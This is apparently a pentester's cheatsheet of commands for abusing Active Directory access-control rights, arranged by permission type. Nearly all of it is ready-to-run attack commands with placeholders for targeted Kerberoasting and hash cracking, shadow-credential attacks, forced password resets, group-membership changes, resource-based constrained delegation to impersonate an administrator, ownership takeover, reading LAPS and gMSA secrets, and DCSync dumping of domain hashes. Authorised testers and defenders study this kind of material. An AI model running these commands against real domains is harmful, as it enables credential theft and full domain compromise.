AD ACLs Cheatsheet

Created2024-11-19|cheatsheet

GenericWrite

Update object’s attributes

Targeted Kerberoasting

1	python targetedKerberoast.py -v -d <domain> -u <username> -p <password>

1	hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force

ShadowCredentials

1	certipy shadow auto -u username@domain -p <password> -account <target_username> -dc-ip <ip>

Using Kerberos

1	certipy shadow auto -username username@domain -p <password> -k -account <target_username> -target <dc>

GenericALL

Full rights to the object (add users to a group or reset user’s password)

Password Change

1	net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash

Add user to a group

1	net rpc group addmem <target_group> <username> -U <domain>/<username> -S <dc>

RBCD

1	rbcd.py -delegate-from '<machine_name>' -delegate-to '<target>' -dc-ip <ip> -action 'write' '<domain>/<username>:<password>'

1	getST.py -spn 'cifs/<dc>' -impersonate administrator -dc-ip <ip> '<domain>/<machine_name>:<password>'

1	export KRB5CCNAME=administrator.ccache

ForceChangePassword

Ability to change user’s password

1	net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>

1	bloodyAD --host <ip> -d <dc> -u <username> -p <password> set password <target_userename> <new_password>

1	python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>

AddMember

1	net rpc group addmem <target_group> <username> -U <domain>/<username> -S <dc>

WriteOwner

Change object owner to attacker controlled user take over the object

1	owneredit.py -action write -new-owner <username> -target <group_name> <domain>/<username>:<password>

1	dacledit.py -action 'write' -rights 'WriteMembers' -principal <username> -target-dn <dn> <domain>/<username>:<password>

1	bloodyAD.py -d <domain> -u <username> -p <password> --host <dc> add groupMember <target_group> <username>

AddKeyCredentialLink

1	python3 pywhisker.py -d <domain> --dc-ip <ip> -u <username> -H :<hashes> --target <target_username> --action "add"

1	certipy shadow auto -username <username>@<domain> -hashes :<hashes> -account <target_username>

ReadLAPSPassword

1	nxc smb <target> -u <username> -p <password> --laps

ReadGMSAPassword

1	nxc ldap <target> -u <username> -p <password> --gmsa

DCSync

1	secretsdump.py <dc> -k

1	nxc smb <domain> -u <username> -p <password> --ntds

1	nxc smb <domain> -k --use-kcache --ntds

Resources

Loading the Database